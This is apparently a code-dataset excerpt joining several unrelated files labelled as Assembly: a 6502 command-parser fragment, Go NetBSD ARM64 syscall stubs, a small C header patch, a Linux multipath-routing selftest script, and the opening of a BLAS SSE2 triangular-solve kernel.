and #%01010101 ; val for patt copy
bne dx0020 ; must be concat or normal
ldx filtbl ; chk for *
lda cmdbuf,x
cmp #'*
bne dx0020
;ldx #1 ;set cnt's
; no pattern matching allowed
;stx f1cnt
;inx
;stx f2cnt
;jmp cpydtd ;go copy
dx0010 lda #badsyn ; syntax error
jmp cmderr
dx0020 lda image ; chk for normal
and #%11011001
bne dx0010
jmp copy
;.end
;prseq
; lda #'= ; special case
; jsr parse
; bne x0020
;x0015 lda #badsyn
; jmp cmderr
;x0020 lda cmdbuf,y
; jsr tst0v1
; bmi x0015
; sta fildrv+1 ; src drv
; dey
; dey
; lda cmdbuf,y
; jsr tst0v1
; bmi x0015
; cmp fildrv+1 ; cannot be equal
; beq x0015
; sta fildrv ; dest drv
; rts
;; .end
| {
"language": "Assembly"
} |
// Copyright 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for ARM64, NetBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
B syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
B syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
B syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
From 41e9e6b5aa13d65480cc960a7f15f97d74d64090 Mon Sep 17 00:00:00 2001
From: Laurent Charpentier <laurent_pubs@yahoo.com>
Date: Mon, 22 Jan 2018 10:49:45 +0100
Subject: [PATCH] fixed unknown type pid_t
Fixed 'unknown type pid_t' gcc compile error in dcbtool_cmds.c and
lldptool_cmds.c
Signed-off-by: Laurent Charpentier <laurent_pubs@yahoo.com>
---
dcbtool_cmds.c | 1 +
lldptool_cmds.c | 1 +
2 files changed, 2 insertions(+)
diff --git a/dcbtool_cmds.c b/dcbtool_cmds.c
index a5cd0fe..ee5c144 100644
--- a/dcbtool_cmds.c
+++ b/dcbtool_cmds.c
@@ -27,6 +27,7 @@
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
+#include <sys/types.h>
#include "clif.h"
#include "dcbtool.h"
#include "lldp_dcbx_cmds.h"
diff --git a/lldptool_cmds.c b/lldptool_cmds.c
index daef8c8..c793e34 100644
--- a/lldptool_cmds.c
+++ b/lldptool_cmds.c
@@ -27,6 +27,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
+#include <sys/types.h>
#include "clif.h"
#include "dcb_types.h"
#include "lldptool.h"
--
2.14.3
| {
"language": "Assembly"
} |
#!/bin/bash
# SPDX-License-Identifier: GPL-2.0
ALL_TESTS="ping_ipv4 ping_ipv6 multipath_test"
NUM_NETIFS=8
source lib.sh
h1_create()
{
vrf_create "vrf-h1"
ip link set dev $h1 master vrf-h1
ip link set dev vrf-h1 up
ip link set dev $h1 up
ip address add 192.0.2.2/24 dev $h1
ip address add 2001:db8:1::2/64 dev $h1
ip route add 198.51.100.0/24 vrf vrf-h1 nexthop via 192.0.2.1
ip route add 2001:db8:2::/64 vrf vrf-h1 nexthop via 2001:db8:1::1
}
h1_destroy()
{
ip route del 2001:db8:2::/64 vrf vrf-h1
ip route del 198.51.100.0/24 vrf vrf-h1
ip address del 2001:db8:1::2/64 dev $h1
ip address del 192.0.2.2/24 dev $h1
ip link set dev $h1 down
vrf_destroy "vrf-h1"
}
h2_create()
{
vrf_create "vrf-h2"
ip link set dev $h2 master vrf-h2
ip link set dev vrf-h2 up
ip link set dev $h2 up
ip address add 198.51.100.2/24 dev $h2
ip address add 2001:db8:2::2/64 dev $h2
ip route add 192.0.2.0/24 vrf vrf-h2 nexthop via 198.51.100.1
ip route add 2001:db8:1::/64 vrf vrf-h2 nexthop via 2001:db8:2::1
}
h2_destroy()
{
ip route del 2001:db8:1::/64 vrf vrf-h2
ip route del 192.0.2.0/24 vrf vrf-h2
ip address del 2001:db8:2::2/64 dev $h2
ip address del 198.51.100.2/24 dev $h2
ip link set dev $h2 down
vrf_destroy "vrf-h2"
}
router1_create()
{
vrf_create "vrf-r1"
ip link set dev $rp11 master vrf-r1
ip link set dev $rp12 master vrf-r1
ip link set dev $rp13 master vrf-r1
ip link set dev vrf-r1 up
ip link set dev $rp11 up
ip link set dev $rp12 up
ip link set dev $rp13 up
ip address add 192.0.2.1/24 dev $rp11
ip address add 2001:db8:1::1/64 dev $rp11
ip address add 169.254.2.12/24 dev $rp12
ip address add fe80:2::12/64 dev $rp12
ip address add 169.254.3.13/24 dev $rp13
ip address add fe80:3::13/64 dev $rp13
ip route add 198.51.100.0/24 vrf vrf-r1 \
nexthop via 169.254.2.22 dev $rp12 \
nexthop via 169.254.3.23 dev $rp13
ip route add 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 \
nexthop via fe80:3::23 dev $rp13
}
router1_destroy()
{
ip route del 2001:db8:2::/64 vrf vrf-r1
ip route del 198.51.100.0/24 vrf vrf-r1
ip address del fe80:3::13/64 dev $rp13
ip address del 169.254.3.13/24 dev $rp13
ip address del fe80:2::12/64 dev $rp12
ip address del 169.254.2.12/24 dev $rp12
ip address del 2001:db8:1::1/64 dev $rp11
ip address del 192.0.2.1/24 dev $rp11
ip link set dev $rp13 down
ip link set dev $rp12 down
ip link set dev $rp11 down
vrf_destroy "vrf-r1"
}
router2_create()
{
vrf_create "vrf-r2"
ip link set dev $rp21 master vrf-r2
ip link set dev $rp22 master vrf-r2
ip link set dev $rp23 master vrf-r2
ip link set dev vrf-r2 up
ip link set dev $rp21 up
ip link set dev $rp22 up
ip link set dev $rp23 up
ip address add 198.51.100.1/24 dev $rp21
ip address add 2001:db8:2::1/64 dev $rp21
ip address add 169.254.2.22/24 dev $rp22
ip address add fe80:2::22/64 dev $rp22
ip address add 169.254.3.23/24 dev $rp23
ip address add fe80:3::23/64 dev $rp23
ip route add 192.0.2.0/24 vrf vrf-r2 \
nexthop via 169.254.2.12 dev $rp22 \
nexthop via 169.254.3.13 dev $rp23
ip route add 2001:db8:1::/64 vrf vrf-r2 \
nexthop via fe80:2::12 dev $rp22 \
nexthop via fe80:3::13 dev $rp23
}
router2_destroy()
{
ip route del 2001:db8:1::/64 vrf vrf-r2
ip route del 192.0.2.0/24 vrf vrf-r2
ip address del fe80:3::23/64 dev $rp23
ip address del 169.254.3.23/24 dev $rp23
ip address del fe80:2::22/64 dev $rp22
ip address del 169.254.2.22/24 dev $rp22
ip address del 2001:db8:2::1/64 dev $rp21
ip address del 198.51.100.1/24 dev $rp21
ip link set dev $rp23 down
ip link set dev $rp22 down
ip link set dev $rp21 down
vrf_destroy "vrf-r2"
}
multipath4_test()
{
local desc="$1"
local weight_rp12=$2
local weight_rp13=$3
local t0_rp12 t0_rp13 t1_rp12 t1_rp13
local packets_rp12 packets_rp13
# Transmit multiple flows from h1 to h2 and make sure they are
# distributed between both multipath links (rp12 and rp13)
# according to the configured weights.
sysctl_set net.ipv4.fib_multipath_hash_policy 1
ip route replace 198.51.100.0/24 vrf vrf-r1 \
nexthop via 169.254.2.22 dev $rp12 weight $weight_rp12 \
nexthop via 169.254.3.23 dev $rp13 weight $weight_rp13
t0_rp12=$(link_stats_tx_packets_get $rp12)
t0_rp13=$(link_stats_tx_packets_get $rp13)
ip vrf exec vrf-h1 $MZ -q -p 64 -A 192.0.2.2 -B 198.51.100.2 \
-d 1msec -t udp "sp=1024,dp=0-32768"
t1_rp12=$(link_stats_tx_packets_get $rp12)
t1_rp13=$(link_stats_tx_packets_get $rp13)
let "packets_rp12 = $t1_rp12 - $t0_rp12"
let "packets_rp13 = $t1_rp13 - $t0_rp13"
multipath_eval "$desc" $weight_rp12 $weight_rp13 $packets_rp12 $packets_rp13
# Restore settings.
ip route replace 198.51.100.0/24 vrf vrf-r1 \
nexthop via 169.254.2.22 dev $rp12 \
nexthop via 169.254.3.23 dev $rp13
sysctl_restore net.ipv4.fib_multipath_hash_policy
}
multipath6_l4_test()
{
local desc="$1"
local weight_rp12=$2
local weight_rp13=$3
local t0_rp12 t0_rp13 t1_rp12 t1_rp13
local packets_rp12 packets_rp13
# Transmit multiple flows from h1 to h2 and make sure they are
# distributed between both multipath links (rp12 and rp13)
# according to the configured weights.
sysctl_set net.ipv6.fib_multipath_hash_policy 1
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 weight $weight_rp12 \
nexthop via fe80:3::23 dev $rp13 weight $weight_rp13
t0_rp12=$(link_stats_tx_packets_get $rp12)
t0_rp13=$(link_stats_tx_packets_get $rp13)
$MZ $h1 -6 -q -p 64 -A 2001:db8:1::2 -B 2001:db8:2::2 \
-d 1msec -t udp "sp=1024,dp=0-32768"
t1_rp12=$(link_stats_tx_packets_get $rp12)
t1_rp13=$(link_stats_tx_packets_get $rp13)
let "packets_rp12 = $t1_rp12 - $t0_rp12"
let "packets_rp13 = $t1_rp13 - $t0_rp13"
multipath_eval "$desc" $weight_rp12 $weight_rp13 $packets_rp12 $packets_rp13
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 \
nexthop via fe80:3::23 dev $rp13
sysctl_restore net.ipv6.fib_multipath_hash_policy
}
multipath6_test()
{
local desc="$1"
local weight_rp12=$2
local weight_rp13=$3
local t0_rp12 t0_rp13 t1_rp12 t1_rp13
local packets_rp12 packets_rp13
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 weight $weight_rp12 \
nexthop via fe80:3::23 dev $rp13 weight $weight_rp13
t0_rp12=$(link_stats_tx_packets_get $rp12)
t0_rp13=$(link_stats_tx_packets_get $rp13)
# Generate 16384 echo requests, each with a random flow label.
for _ in $(seq 1 16384); do
ip vrf exec vrf-h1 $PING6 2001:db8:2::2 -F 0 -c 1 -q &> /dev/null
done
t1_rp12=$(link_stats_tx_packets_get $rp12)
t1_rp13=$(link_stats_tx_packets_get $rp13)
let "packets_rp12 = $t1_rp12 - $t0_rp12"
let "packets_rp13 = $t1_rp13 - $t0_rp13"
multipath_eval "$desc" $weight_rp12 $weight_rp13 $packets_rp12 $packets_rp13
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 \
nexthop via fe80:3::23 dev $rp13
}
multipath_test()
{
log_info "Running IPv4 multipath tests"
multipath4_test "ECMP" 1 1
multipath4_test "Weighted MP 2:1" 2 1
multipath4_test "Weighted MP 11:45" 11 45
log_info "Running IPv6 multipath tests"
multipath6_test "ECMP" 1 1
multipath6_test "Weighted MP 2:1" 2 1
multipath6_test "Weighted MP 11:45" 11 45
log_info "Running IPv6 L4 hash multipath tests"
multipath6_l4_test "ECMP" 1 1
multipath6_l4_test "Weighted MP 2:1" 2 1
multipath6_l4_test "Weighted MP 11:45" 11 45
}
setup_prepare()
{
h1=${NETIFS[p1]}
rp11=${NETIFS[p2]}
rp12=${NETIFS[p3]}
rp22=${NETIFS[p4]}
rp13=${NETIFS[p5]}
rp23=${NETIFS[p6]}
rp21=${NETIFS[p7]}
h2=${NETIFS[p8]}
vrf_prepare
h1_create
h2_create
router1_create
router2_create
forwarding_enable
}
cleanup()
{
pre_cleanup
forwarding_restore
router2_destroy
router1_destroy
h2_destroy
h1_destroy
vrf_cleanup
}
ping_ipv4()
{
ping_test $h1 198.51.100.2
}
ping_ipv6()
{
ping6_test $h1 2001:db8:2::2
}
trap cleanup EXIT
setup_prepare
setup_wait
tests_run
exit $EXIT_STATUS
| {
"language": "Assembly"
} |
/*********************************************************************/
/* Copyright 2009, 2010 The University of Texas at Austin. */
/* All rights reserved. */
/* */
/* Redistribution and use in source and binary forms, with or */
/* without modification, are permitted provided that the following */
/* conditions are met: */
/* */
/* 1. Redistributions of source code must retain the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer. */
/* */
/* 2. Redistributions in binary form must reproduce the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer in the documentation and/or other materials */
/* provided with the distribution. */
/* */
/* THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY OF TEXAS AT */
/* AUSTIN ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, */
/* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF */
/* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE */
/* DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF TEXAS AT */
/* AUSTIN OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, */
/* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES */
/* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE */
/* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR */
/* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF */
/* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT */
/* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT */
/* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE */
/* POSSIBILITY OF SUCH DAMAGE. */
/* */
/* The views and conclusions contained in the software and */
/* documentation are those of the authors and should not be */
/* interpreted as representing official policies, either expressed */
/* or implied, of The University of Texas at Austin. */
/*********************************************************************/
#define ASSEMBLER
#include "common.h"
#if !defined(HAVE_SSE2) || !defined(HAVE_MMX)
#error You have to check your configuration.
#endif
#define STACK 16
#define ARGS 0
#define STACK_M 4 + STACK + ARGS(%esi)
#define STACK_N 8 + STACK + ARGS(%esi)
#define STACK_K 12 + STACK + ARGS(%esi)
#define STACK_ALPHA 16 + STACK + ARGS(%esi)
#define STACK_A 24 + STACK + ARGS(%esi)
#define STACK_B 28 + STACK + ARGS(%esi)
#define STACK_C 32 + STACK + ARGS(%esi)
#define STACK_LDC 36 + STACK + ARGS(%esi)
#define STACK_OFFT 40 + STACK + ARGS(%esi)
#define ALPHA 0(%esp)
#define K 16(%esp)
#define N 20(%esp)
#define M 24(%esp)
#define A 28(%esp)
#define C 32(%esp)
#define J 36(%esp)
#define OLD_STACK 40(%esp)
#define OFFSET 44(%esp)
#define KK 48(%esp)
#define KKK 52(%esp)
#define AORIG 56(%esp)
#define BORIG 60(%esp)
#define BUFFER 128(%esp)
#define STACK_ALIGN 4096
#define STACK_OFFSET 1024
#define B %edi
#define AA %edx
#define BB %ecx
#define LDC %ebp
#define PREFETCHSIZE (8 * 4)
#define KERNEL1(address) \
movq (PREFETCHSIZE + 0) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm0, %xmm2; \
mulpd 2 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 0 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 2 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 2 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 4 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 4 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL2(address) \
mulpd %xmm0, %xmm2; \
mulpd 6 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 4 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 6 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 6 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 16 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 16 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL3(address) \
movq (PREFETCHSIZE + 8) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm1, %xmm3; \
mulpd 10 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 8 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 10 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 10 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 12 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 12 * SIZE + (address) * SIZE(AA), %xmm1
#define KERNEL4(address) \
mulpd %xmm1, %xmm3; \
mulpd 14 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 12 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 14 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 14 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 24 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 24 * SIZE + (address) * SIZE(AA), %xmm1
#define KERNEL5(address) \
movq (PREFETCHSIZE + 16) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm0, %xmm2; \
mulpd 18 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 16 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 18 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 18 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 20 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 20 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL6(address) \
mulpd %xmm0, %xmm2; \
mulpd 22 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 20 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 22 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 22 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 32 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 32 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL7(address) \
movq (PREFETCHSIZE + 24) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm1, %xmm3; \
mulpd 26 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 24 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 26 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 26 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 28 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 28 * SIZE + (address) * SIZE(AA), %xmm1
#define KERNEL8(address) \
mulpd %xmm1, %xmm3; \
mulpd 30 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 28 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 30 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 30 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 40 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 40 * SIZE + (address) * SIZE(AA), %xmm1
PROLOGUE
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
PROFCODE
EMMS
movl %esp, %esi # save old stack
subl $128 + LOCAL_BUFFER_SIZE + STACK_OFFSET, %esp
andl $-STACK_ALIGN, %esp
addl $STACK_OFFSET, %esp
STACK_TOUCHING
movd STACK_M, %mm0
movl STACK_N, %eax
movd STACK_K, %mm1
movd STACK_A, %mm2
movl STACK_B, B
movd STACK_C, %mm3
movl STACK_LDC, LDC
movd STACK_OFFT, %mm4
movd %mm1, K
movl %eax, N
movd %mm0, M
movd %mm2, A
movd %mm3, C
movl %esi, OLD_STACK
movd %mm4, OFFSET
movd %mm4, KK
sall $BASE_SHIFT, LDC
#ifdef LN
movl M, %eax
leal (, %eax, SIZE), %eax
addl %eax, C
imull K, %eax
addl %eax, A
#endif
#ifdef RT
movl N, %eax
leal (, %eax, SIZE), %eax
imull K, %eax
addl %eax, B
movl N, %eax
imull LDC, %eax
addl %eax, C
#endif
#ifdef RN
negl KK
#endif
#ifdef RT
movl N, %eax
subl OFFSET, %eax
movl %eax, KK
#endif
movl N, %eax
sarl $1, %eax
movl %eax, J
jle .L100
ALIGN_2
.L01:
/* Copying to Sub Buffer */
#ifdef LN
movl OFFSET, %eax
addl M, %eax
movl %eax, KK
#endif
leal BUFFER, %ecx
#ifdef RT
movl K, %eax
sall $1 + BASE_SHIFT, %eax
subl %eax, B
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl B, BORIG
leal (, %eax, SIZE), %eax
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#ifdef LT
movl OFFSET, %eax
movl %eax, KK
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $2, %eax
jle .L03
ALIGN_2
.L02:
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
movsd 2 * SIZE(B), %xmm2
movsd 3 * SIZE(B), %xmm3
movsd 4 * SIZE(B), %xmm4
movsd 5 * SIZE(B), %xmm5
movsd 6 * SIZE(B), %xmm6
movsd 7 * SIZE(B), %xmm7
unpcklpd %xmm0, %xmm0
unpcklpd %xmm1, %xmm1
unpcklpd %xmm2, %xmm2
unpcklpd %xmm3, %xmm3
unpcklpd %xmm4, %xmm4
unpcklpd %xmm5, %xmm5
unpcklpd %xmm6, %xmm6
unpcklpd %xmm7, %xmm7
movapd %xmm0, 0 * SIZE(%ecx)
movapd %xmm1, 2 * SIZE(%ecx)
movapd %xmm2, 4 * SIZE(%ecx)
movapd %xmm3, 6 * SIZE(%ecx)
movapd %xmm4, 8 * SIZE(%ecx)
movapd %xmm5, 10 * SIZE(%ecx)
movapd %xmm6, 12 * SIZE(%ecx)
movapd %xmm7, 14 * SIZE(%ecx)
prefetcht0 104 * SIZE(B)
addl $ 8 * SIZE, B
addl $16 * SIZE, %ecx
decl %eax
jne .L02
ALIGN_2
.L03:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $3, %eax
BRANCH
jle .L05
ALIGN_4
.L04:
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
unpcklpd %xmm0, %xmm0
unpcklpd %xmm1, %xmm1
movapd %xmm0, 0 * SIZE(%ecx)
movapd %xmm1, 2 * SIZE(%ecx)
addl $2 * SIZE, B
addl $4 * SIZE, %ecx
decl %eax
jne .L04
ALIGN_4
.L05:
#if defined(LT) || defined(RN)
movl A, AA
#else
movl A, %eax
movl %eax, AORIG
#endif
leal (, LDC, 2), %eax
#ifdef RT
subl %eax, C
#endif
movl C, %esi # coffset = c
#ifndef RT
addl %eax, C
#endif
movl M, %ebx
sarl $2, %ebx # i = (m >> 2)
jle .L30
ALIGN_4
.L10:
#ifdef LN
movl K, %eax
sall $2 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
#endif
leal BUFFER, BB
#if defined(LN) || defined(RT)
movl KK, %eax
sall $1 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
prefetcht2 4 * SIZE(%esi)
prefetcht2 4 * SIZE(%esi, LDC)
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
#ifdef PENTIUM4
andl $-8, %eax
NOBRANCH
je .L12
sall $3, %eax
.L1X:
KERNEL1(32 * 0)
KERNEL2(32 * 0)
KERNEL3(32 * 0)
KERNEL4(32 * 0)
KERNEL5(32 * 0)
KERNEL6(32 * 0)
KERNEL7(32 * 0)
KERNEL8(32 * 0)
cmpl $64 * 1, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 1)
KERNEL2(32 * 1)
KERNEL3(32 * 1)
KERNEL4(32 * 1)
KERNEL5(32 * 1)
KERNEL6(32 * 1)
KERNEL7(32 * 1)
KERNEL8(32 * 1)
cmpl $64 * 2, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 2)
KERNEL2(32 * 2)
KERNEL3(32 * 2)
KERNEL4(32 * 2)
KERNEL5(32 * 2)
KERNEL6(32 * 2)
KERNEL7(32 * 2)
KERNEL8(32 * 2)
cmpl $64 * 3, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 3)
KERNEL2(32 * 3)
KERNEL3(32 * 3)
KERNEL4(32 * 3)
KERNEL5(32 * 3)
KERNEL6(32 * 3)
KERNEL7(32 * 3)
KERNEL8(32 * 3)
cmpl $64 * 4, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 4)
KERNEL2(32 * 4)
KERNEL3(32 * 4)
KERNEL4(32 * 4)
KERNEL5(32 * 4)
KERNEL6(32 * 4)
KERNEL7(32 * 4)
KERNEL8(32 * 4)
cmpl $64 * 5, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 5)
KERNEL2(32 * 5)
KERNEL3(32 * 5)
KERNEL4(32 * 5)
KERNEL5(32 * 5)
KERNEL6(32 * 5)
KERNEL7(32 * 5)
KERNEL8(32 * 5)
cmpl $64 * 6, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 6)
KERNEL2(32 * 6)
KERNEL3(32 * 6)
KERNEL4(32 * 6)
KERNEL5(32 * 6)
KERNEL6(32 * 6)
KERNEL7(32 * 6)
KERNEL8(32 * 6)
cmpl $64 * 7, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 7)
KERNEL2(32 * 7)
KERNEL3(32 * 7)
KERNEL4(32 * 7)
KERNEL5(32 * 7)
KERNEL6(32 * 7)
KERNEL7(32 * 7)
KERNEL8(32 * 7)
addl $64 * 4 * SIZE, AA
addl $64 * 4 * SIZE, BB
subl $64 * 8, %eax
BRANCH
jg .L1X
.L11:
leal (AA, %eax, 4), AA
leal (BB, %eax, 4), BB
#else
sarl $3, %eax
je .L12
.L11:
KERNEL1(32 * 0)
KERNEL2(32 * 0)
KERNEL3(32 * 0)
KERNEL4(32 * 0)
KERNEL5(32 * 0)
KERNEL6(32 * 0)
KERNEL7(32 * 0)
KERNEL8(32 * 0)
addl $32 * SIZE, %ecx
addl $32 * SIZE, %edx
decl %eax
jne .L11
#endif
.L12:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 1)
BRANCH
je .L14
.L13:
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm4
movapd 0 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 2 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm6
movapd 4 * SIZE(BB), %xmm2
addpd %xmm0, %xmm7
movapd 4 * SIZE(AA), %xmm0
addl $4 * SIZE, AA # aoffset += 8
addl $4 * SIZE, BB # boffset1 += 8
subl $1, %eax
jg .L13
ALIGN_4
.L14:
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $4, %eax
#else
subl $2, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#if defined(LN) || defined(LT)
movapd %xmm4, %xmm0
unpcklpd %xmm5, %xmm4
unpckhpd %xmm5, %xmm0
movapd %xmm6, %xmm1
unpcklpd %xmm7, %xmm6
unpckhpd %xmm7, %xmm1
movapd 0 * SIZE(B), %xmm2
movapd 2 * SIZE(B), %xmm3
movapd 4 * SIZE(B), %xmm5
movapd 6 * SIZE(B), %xmm7
subpd %xmm4, %xmm2
subpd %xmm0, %xmm3
subpd %xmm6, %xmm5
subpd %xmm1, %xmm7
#else
movapd 0 * SIZE(AA), %xmm0
movapd 2 * SIZE(AA), %xmm1
movapd 4 * SIZE(AA), %xmm2
movapd 6 * SIZE(AA), %xmm3
subpd %xmm4, %xmm0
subpd %xmm6, %xmm1
subpd %xmm5, %xmm2
subpd %xmm7, %xmm3
#endif
#ifdef LN
movsd 15 * SIZE(AA), %xmm0
movhpd 15 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm7
movsd 14 * SIZE(AA), %xmm0
movhpd 14 * SIZE(AA), %xmm0
mulpd %xmm7, %xmm0
subpd %xmm0, %xmm5
movsd 13 * SIZE(AA), %xmm0
movhpd 13 * SIZE(AA), %xmm0
mulpd %xmm7, %xmm0
subpd %xmm0, %xmm3
movsd 12 * SIZE(AA), %xmm0
